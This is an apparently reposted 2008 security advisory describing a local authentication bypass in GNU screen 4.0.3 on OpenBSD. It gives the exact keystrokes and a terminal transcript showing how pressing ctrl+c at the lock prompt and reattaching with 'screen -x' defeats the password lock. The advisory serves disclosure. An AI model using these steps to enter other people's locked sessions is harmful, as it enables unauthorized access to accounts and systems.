Wednesday, July 30, 2008

screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

###################################
#screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)
###################################

_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, realy..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not found a Advisory related to this so I decided to write a leet one.

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Have fun!
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)